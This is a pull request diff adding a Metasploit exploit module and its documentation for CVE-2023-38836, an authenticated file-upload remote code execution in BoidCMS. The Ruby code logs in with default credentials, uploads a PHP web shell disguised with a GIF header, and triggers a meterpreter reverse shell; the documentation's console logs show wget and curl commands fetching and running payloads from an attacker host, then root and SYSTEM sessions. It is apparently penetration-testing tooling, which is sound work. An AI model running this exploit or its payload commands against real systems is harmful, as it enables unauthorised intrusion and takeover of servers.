### PR TITLE
Add module for BoidCMS Authenticated RCE CVE-2023-38836

### DIFF
--- a/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
+++ b/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
@@ -1,14 +1,14 @@
 ## Vulnerable Application
 
 This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
-and above.  BoidCMS allows the authenticated upload of a php file as media if the file has
+and below.  BoidCMS allows the authenticated upload of a php file as media if the file has
 the GIF header, even if the file is a php file.
 Once the file is uploaded, a user can then feed a command to the php file in a `GET` request.
 
 ## Installation
 
 ### Ubuntu 22.01.1x64 (Any 'nix should work)
-1. `sudo apt-get install apache #install apache`
+1. `sudo apt-get install apache2 #install apache`
 2. `sudo apt-get install php8.0 #install php`
 3. `sudo a2enmod rewrite #enable mod_rewrite`
 4. `sudo systemctl restart apache2 #restart apache2`
@@ -24,7 +24,7 @@ Once the file is uploaded, a user can then feed a command to the php file in a `
 8. `sudo php -S [ip_address]:8080 #start php server`
 
 ### Windows 2019 server (Any Windows should work)
-1. Download XMAPP for Windows from https://www.apachefriends.org/download.html
+1. Download and install XMAPP for Windows from https://www.apachefriends.org/download.html
 2. Reboot
 3. Open XAMPP Control panel as admin.
 4. Follow installation instructions here: https://boidcms.github.io/#/install

--- a/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
+++ b/documentation/modules/exploit/multi/http/cve_2023_38836_boidcms.md
@@ -1,0 +1,234 @@
+## Vulnerable Application
+
+This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
+and above.  BoidCMS allows the authenticated upload of a php file as media if the file has
+the GIF header, even if the file is a php file.
+Once the file is uploaded, a user can then feed a command to the php file in a `GET` request.
+
+## Installation
+
+### Ubuntu 22.01.1x64 (Any 'nix should work)
+1. `sudo apt-get install apache #install apache`
+2. `sudo apt-get install php8.0 #install php`
+3. `sudo a2enmod rewrite #enable mod_rewrite`
+4. `sudo systemctl restart apache2 #restart apache2`
+5. Follow installation instructions here: https://boidcms.github.io/#/install 
+   a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
+      the contents into the `/var/www/html/` folder on the apache server.
+   b. Add
+      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
+      before the following line:
+      `$App->render();`
+6. `reboot`
+7. `cd /var/www/html`
+8. `sudo php -S [ip_address]:8080 #start php server`
+
+### Windows 2019 server (Any Windows should work)
+1. Download XMAPP for Windows from https://www.apachefriends.org/download.html
+2. Reboot
+3. Open XAMPP Control panel as admin.
+4. Follow installation instructions here: https://boidcms.github.io/#/install
+   a. download https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.0.zip, unzip, and place
+      the contents into the `C:\xampp\htdocs\` folder on the apache server.
+   b. Add
+      `$App->page = ltrim( $_SERVER[ 'PATH_INFO' ] ?? '', '/' );`
+      before the following line:
+      `$App->render();`
+5. Verify that mod_rewrite is enabled for Apache.
+   a. Click on the `Config` button beside the Apache status in XAMPP Control panel
+   b. Select the httpd.conf
+   c. Verify `LoadModule rewrite_module modules/mod_rewrite.so` is uncommented
+   d. Restart Apache if you needed to uncomment the above line
+6. Start the php server
+   a. Open cmd window as Administrator
+   b. `cd C:\xampp\htdocs\`
+   c. `C:\xampp\php\php.exe -S 10.5.134.102:8080` #I don't know why we start the server on port 8080,
+      but on windows, we access with the rport value of 80.
+
+## Verification Steps
+
+1. Install BoidCMS
+1. Start msfconsole
+1. Do: `use exploit/multi/http/cve_2023_38836_boidcms`
+1. Do: `set CMS_USERNAME [username]`
+1. Do: `set CMS_PASSWORD [password]`
+1. Do: `set TARGETURI [target uri]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### CMS_USERNAME
+The username for the BoidCMS admin panel.  Default is `admin`
+
+### CMS_PASSWORD
+The username for the BoidCMS admin panel.  Default is `password`
+
+### TARGETURI
+The root of the web page BoidCMS manages. Empty string by default.
+
+## Scenarios
+
+### BoidCMS on Ubuntu 22.04.1x64
+
+```
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
+
+Module options (exploit/multi/http/cve_2023_38836_boidcms):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   CMS_PASSWORD  password         yes       Password
+   CMS_USERNAME  admin            yes       Username
+   PHP_FILENAME  eI1lHLx.php      yes       The name for the php file to upload
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         8080             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                      yes       The path
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      LZfjvRRrNR       no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   nix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
+
+[*] Command to run on remote host: wget -qO /tmp/oEsnOArk http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/oEsnOArk; /tmp/oEsnOArk &
+[*] Fetch Handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
+[*] Getting Token
+[*] Logging into CMS
+[*] Uploading PHP file eI1lHLx.php
+[*] launching Payload
+[*] Client 10.5.134.129 requested /v3vZxR3P-stuKWjUe6pCeA
+[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 10.5.134.129
+[+] Deleted eI1lHLx.php
+[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:49168) at 2024-02-16 16:32:33 -0600
+
+meterpreter > sysinfo
+Computer     : 10.5.134.129
+OS           : Ubuntu 22.04 (Linux 6.5.0-17-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > 
+
+
+
+```
+
+
+### BoidCMS on Windows Server 2019x64
+
+```
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
+
+Module options (exploit/multi/http/cve_2023_38836_boidcms):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   CMS_PASSWORD  password         yes       Password
+   CMS_USERNAME  admin            yes       Username
+   PHP_FILENAME  eI1lHLx.php      yes       The name for the php file to upload
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS        10.5.134.102     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
+                                            metasploit.html
+   RPORT         80               yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI                      yes       The path
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   EXTENSIONS                           no        Comma-separate list of extensions to load
+   EXTINIT                              no        Initialization strings for extensions
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      EwRzYaki         no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
+
+[*] Command to run on remote host: curl -so %TEMP%\YnmWUfMzCxY.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\YnmWUfMzCxY.exe
+[*] Fetch Handler listening on 10.5.135.201:8080
+[*] HTTP server started
+[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
+[*] Started reverse TCP handler on 10.5.135.201:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
+[*] Getting Token
+[*] Logging into CMS
+[*] Uploading PHP file eI1lHLx.php
+[*] launching Payload
+[*] Client 10.5.134.102 requested /h8r3u5VU3v-qeqUW3_anLw
+[*] Sending payload to 10.5.134.102 (curl/7.55.1)
+[+] Deleted eI1lHLx.php
+[*] Meterpreter session 4 opened (10.5.135.201:4444 -> 10.5.134.102:50085) at 2024-02-16 16:41:48 -0600
+
+meterpreter > sysinfo
+Computer        : WIN-2E6BPFGP9F7
+OS              : Windows Server 2019 (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: WIN-2E6BPFGP9F7\msfuser
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > 
+
+```

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['linux', 'unix', 'python'],
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
                 'FETCH_COMMAND' => 'WGET',
                 'FETCH_WRITABLE_DIR' => '/tmp'
               }
@@ -47,10 +47,9 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['windows', 'python'],
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/x64/http/meterpreter/reverse_tcp'
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'
               }
             }
-
           ]
         ],
         'DefaultTarget' => 0,

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
   prepend Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -60,6 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     ])
     @token = nil
+    @shell_filename = nil
   end
 
   def check
@@ -97,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @token = extract_token(res)
   end
 
-  def cms_login(login_token)
+  def cms_login?(login_token)
     vprint_status('Logging into CMS')
     cms_password = datastore['CMS_PASSWORD']
     cms_username = datastore['CMS_USERNAME']
@@ -126,16 +128,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_form_data' => vars_form_data
     )
-    if res && res.code == 302
-      return true
-    else
-      return false
-    end
+    res && res.code == 302
   end
 
-  def upload_php(login_token, shell_filename)
+  def upload_php?(login_token, shell_filename)
     vprint_status("Uploading PHP file #{shell_filename}")
-
     vars_form_data =
       [
         {
@@ -154,20 +151,19 @@ class MetasploitModule < Msf::Exploit::Remote
       ]
 
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
+      'uri' => normalize_uri(target_uri.path, 'admin'),
       'method' => 'POST',
       'keep_cookies' => true,
+      'vars_get' => {
+        'page' => 'media'
+      },
       'vars_form_data' => vars_form_data
     )
-    if res && res.code == 302
-      return true
-    else
-      return false
-    end
+    res && res.code == 302
   end
 
   def launch_payload(shell_filename, payload_cmd)
-    # retrieve output
+    # send the command to the php page
     vprint_status('launching Payload')
     send_request_cgi(
       'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
@@ -180,25 +176,19 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_new_session(session)
-    super
-    vprint_status("Attempting to delete #{@shell_filename}")
-    if session.type == 'meterpreter'
-      session.fs.file.rm(@shell_filename)
-    else
-      print_warning("Failed to automatically delete #{@shell_filename}")
-    end
-  end
-
   def exploit
     payload_cmd = payload.encoded
     @shell_filename = datastore['PHP_FILENAME']
     login_token = cms_token
 
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
-    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login(login_token)
-    fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php(login_token, @shell_filename)
-    launch_payload(@shell_filename, payload_cmd)
+    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
+    if upload_php?(login_token, @shell_filename)
+      register_file_for_cleanup @shell_filename
+      launch_payload(@shell_filename, payload_cmd)
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
+    end
   end
 
 end

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -29,12 +29,12 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
         ],
         'Privileged' => false,
-        'Platform' => ['linux', 'unix'],
+        'Platform' => ['linux', 'unix', 'python'],
         'Targets' => [
           [
             'nix Command',
             {
-              'Platform' => ['unix', 'linux'],
+              'Platform' => ['unix', 'linux', 'python'],
               'Arch' => ARCH_CMD,
               'Type' => :nix_cmd,
               'DefaultOptions' => {
@@ -96,66 +96,95 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    payload_cmd = payload.encoded
+    shell_file='shall.php'
     # initial login
     vprint_status('Getting Logon Token')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin'),
-      'method' => 'GET',
-      'keep_cookies' => true
+      'keep_cookies' => true,
+      'method' => 'GET'
     )
     login_token = extract_token(res)
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if login_token.nil?
 
-    login_data =
-      {
-        'username': 'admin',
-        'password': 'password',
-        'login': 'Login',
-        'token': login_token.to_s
-      }
+    vars_form_data =
+      [
+        {
+          'name' => 'username',
+          'data' => 'admin'
+        },
+        {
+          'name' => 'password',
+          'data' => 'password'
+        },
+        {
+          'name' => 'login',
+          'data' => 'Login'
+        },
+        {
+          'name' => 'token',
+          'data' => login_token.to_s
+        }
+      ]
 
     vprint_status('Logging in')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin'),
       'method' => 'POST',
       'keep_cookies' => true,
-      'data' => login_data.to_json
+      'vars_form_data' => vars_form_data
     )
 
     vprint_status('Getting Media Token')
     # get media upload token
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
-      'method' => 'GET',
-      'keep_cookies' => true
+      'keep_cookies' => true,
+      'method' => 'GET'
     )
 
-    media_token = extract_token(res)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if media_token.nil?
-    vprint_status("Media token = #{media_token}")
-
-    upload_data =
-      {
-        'token': media_token.to_s,
-        'upload': 'Upload'
-      }
+    # media_token = extract_token(res)
+    # fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if media_token.nil?
+    # vprint_status("Media token = #{media_token}")
 
     # upload file
     vprint_status('Uploading PHP')
+
+    vars_form_data =
+      [
+        {
+          'name' => 'file',
+          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',
+          'filename' => shell_file
+        },
+        {
+          'name' => 'token',
+          'data' => login_token.to_s
+        },
+        {
+          'name' => 'upload',
+          'data' => 'Upload'
+        }
+      ]
+
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
       'method' => 'POST',
-      'data' => upload_data.to_json,
-      'files' => 'GIF89a;\n<?php system($_GET["id"]) ?>',
-      'keep_cookies' => true
+      'keep_cookies' => true,
+      'vars_form_data' => vars_form_data
     )
 
     # retrieve output
     vprint_status('Checking result')
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/media/shell.php'),
+      'uri' => normalize_uri(target_uri.path, "/media/#{shell_file}"),
       'method' => 'GET',
-      'keep_cookies' => true
+      'keep_cookies' => true,
+      'vars_get' =>
+        {
+          'cmd' => payload_cmd
+        }
     )
 
 

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -17,7 +17,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'BoidCMS Command Injection',
         'Description' => %q{
-          TBA
+          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0
+          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has
+          the GIF header, even if the file is a php file.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -47,13 +49,15 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['windows', 'python'],
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp'
+                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',
+                'FETCH_WRITABLE_DIR' => '%TEMP%',
+                'FETCH_COMMAND' => 'CURL'
               }
             }
           ]
         ],
         'DefaultTarget' => 0,
-        'DisclosureDate' => '2023-02-24',
+        'DisclosureDate' => '2023-07-13',
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
@@ -83,8 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
       title = res.get_html_document.xpath('//title').first.to_s
       return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')
     end
-  rescue StandardError => e
-    return Exploit::CheckCode::Safe("Unable to check target #{e}")
+    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')
   end
 
   def extract_token(res)
@@ -186,7 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    payload_cmd = payload.encoded
     @shell_filename = datastore['PHP_FILENAME']
     login_token = cms_token
 
@@ -194,7 +196,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)
     if upload_php?(login_token, @shell_filename)
       register_file_for_cleanup @shell_filename
-      launch_payload(@shell_filename, payload_cmd)
+      launch_payload(@shell_filename, payload.encoded)
     else
       fail_with(Failure::UnexpectedReply, 'Failed to upload php files')
     end

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -9,13 +9,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpClient
   prepend Exploit::Remote::AutoCheck
-  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name' => 'ZoneMinder Snapshots Command Injection',
+        'Name' => 'BoidCMS Command Injection',
         'Description' => %q{
           TBA
         },
@@ -30,30 +29,19 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Privileged' => false,
         'Platform' => ['linux', 'unix', 'python'],
+        'Arch' => ARCH_CMD,
         'Targets' => [
           [
             'nix Command',
             {
-              'Platform' => ['unix', 'linux', 'python'],
-              'Arch' => ARCH_CMD,
-              'Type' => :nix_cmd,
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'FETCH_COMMAND' => 'WGET',
                 'FETCH_WRITABLE_DIR' => '/tmp'
               }
             }
-          ],
-          [
-            'Linux (Dropper)',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_X64],
-              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
-              'Type' => :linux_dropper
-            }
-          ],
+          ]
         ],
-        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-02-24',
         'Notes' => {
@@ -65,26 +53,16 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       OptString.new('TARGETURI', [true, 'The path', '/admin'])
+                       OptString.new('TARGETURI', [true, 'The path', '']),
+                       OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
+                       OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
+                       OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])
+
                      ])
-    @token = nil
   end
 
   def check
     Exploit::CheckCode::Appears('Yay')
-  end
-
-  def execute_command(cmd, _opts = {})
-    command = Rex::Text.uri_encode(cmd)
-    print_status('Sending payload')
-    data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
-    data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
-    send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'index.php'),
-      'method' => 'POST',
-      'data' => data.to_s
-    )
-    print_good('Payload sent')
   end
 
   def extract_token(res)
@@ -95,28 +73,31 @@ class MetasploitModule < Msf::Exploit::Remote
     token
   end
 
-  def exploit
-    payload_cmd = payload.encoded
-    shell_file='shall.php'
+  def cms_token
     # initial login
-    vprint_status('Getting Logon Token')
+    vprint_status('Getting Token')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin'),
       'keep_cookies' => true,
       'method' => 'GET'
     )
     login_token = extract_token(res)
-    fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if login_token.nil?
 
+  end
+
+  def cms_login(login_token)
+    vprint_status('Logging into CMS')
+    cms_password = datastore['CMS_PASSWORD']
+    cms_username = datastore['CMS_USERNAME']
     vars_form_data =
       [
         {
           'name' => 'username',
-          'data' => 'admin'
+          'data' => cms_username
         },
         {
           'name' => 'password',
-          'data' => 'password'
+          'data' => cms_password
         },
         {
           'name' => 'login',
@@ -127,36 +108,28 @@ class MetasploitModule < Msf::Exploit::Remote
           'data' => login_token.to_s
         }
       ]
-
-    vprint_status('Logging in')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin'),
       'method' => 'POST',
       'keep_cookies' => true,
       'vars_form_data' => vars_form_data
     )
+    if res && res.code == 302
+      return true
+    else
+      return false
+    end
+  end
 
-    vprint_status('Getting Media Token')
-    # get media upload token
-    res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
-      'keep_cookies' => true,
-      'method' => 'GET'
-    )
-
-    # media_token = extract_token(res)
-    # fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if media_token.nil?
-    # vprint_status("Media token = #{media_token}")
-
-    # upload file
-    vprint_status('Uploading PHP')
+  def upload_php(login_token, shell_filename)
+    vprint_status("Uploading PHP file #{shell_filename}")
 
     vars_form_data =
       [
         {
           'name' => 'file',
           'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',
-          'filename' => shell_file
+          'filename' => shell_filename
         },
         {
           'name' => 'token',
@@ -174,11 +147,18 @@ class MetasploitModule < Msf::Exploit::Remote
       'keep_cookies' => true,
       'vars_form_data' => vars_form_data
     )
+    if res && res.code == 302
+      return true
+    else
+      return false
+    end
+  end
 
+  def launch_payload(shell_filename, payload_cmd)
     # retrieve output
-    vprint_status('Checking result')
+    vprint_status('launching Payload')
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, "/media/#{shell_file}"),
+      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
       'method' => 'GET',
       'keep_cookies' => true,
       'vars_get' =>
@@ -186,14 +166,27 @@ class MetasploitModule < Msf::Exploit::Remote
           'cmd' => payload_cmd
         }
     )
+  end
 
-
-    case target['Type']
-    when :unix_cmd
-      execute_command(payload.encoded)
-    when :linux_dropper
-      execute_cmdstager
+  def on_new_session(session)
+    super
+    vprint_status("Attempting to delete #{@shell_filename}")
+    if session.type == "meterpreter"
+      session.fs.file.rm(@shell_filename)
+    else
+      print_warning('Make sure to manually delete #{@shell_filename}')
     end
+  end
+
+  def exploit
+    payload_cmd = payload.encoded
+    @shell_filename = datastore['PHP_FILENAME']
+    login_token = cms_token
+
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
+    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login(login_token)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php(login_token, @shell_filename)
+    launch_payload(@shell_filename,payload_cmd)
   end
 
 end

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -53,16 +53,27 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     register_options([
-                       OptString.new('TARGETURI', [true, 'The path', '']),
-                       OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
-                       OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
-                       OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])
+      OptString.new('TARGETURI', [true, 'The path', '']),
+      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),
+      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),
+      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])
 
-                     ])
+    ])
+    @token = nil
   end
 
   def check
-    Exploit::CheckCode::Appears('Yay')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'keep_cookies' => true,
+      'method' => 'GET'
+    )
+    if res && res.code == 200
+      title = res.get_html_document.xpath('//title').first.to_s
+      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')
+    end
+  rescue StandardError => e
+    return Exploit::CheckCode::Safe("Unable to check target #{e}")
   end
 
   def extract_token(res)
@@ -75,14 +86,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cms_token
     # initial login
+    return @token unless @token.nil?
+
     vprint_status('Getting Token')
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'admin'),
       'keep_cookies' => true,
       'method' => 'GET'
     )
-    login_token = extract_token(res)
-
+    @token = extract_token(res)
   end
 
   def cms_login(login_token)
@@ -157,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def launch_payload(shell_filename, payload_cmd)
     # retrieve output
     vprint_status('launching Payload')
-    res = send_request_cgi(
+    send_request_cgi(
       'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),
       'method' => 'GET',
       'keep_cookies' => true,
@@ -171,10 +183,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def on_new_session(session)
     super
     vprint_status("Attempting to delete #{@shell_filename}")
-    if session.type == "meterpreter"
+    if session.type == 'meterpreter'
       session.fs.file.rm(@shell_filename)
     else
-      print_warning('Make sure to manually delete #{@shell_filename}')
+      print_warning("Failed to automatically delete #{@shell_filename}")
     end
   end
 
@@ -186,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?
     fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login(login_token)
     fail_with(Failure::UnexpectedReply, 'Failed to upload php files') unless upload_php(login_token, @shell_filename)
-    launch_payload(@shell_filename,payload_cmd)
+    launch_payload(@shell_filename, payload_cmd)
   end
 
 end

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -29,18 +29,28 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
         ],
         'Privileged' => false,
-        'Platform' => ['linux', 'unix', 'python'],
         'Arch' => ARCH_CMD,
         'Targets' => [
           [
             'nix Command',
             {
+              'Platform' => ['linux', 'unix', 'python'],
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
                 'FETCH_COMMAND' => 'WGET',
                 'FETCH_WRITABLE_DIR' => '/tmp'
               }
             }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['windows', 'python'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/x64/http/meterpreter/reverse_tcp'
+              }
+            }
+
           ]
         ],
         'DefaultTarget' => 0,

--- a/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
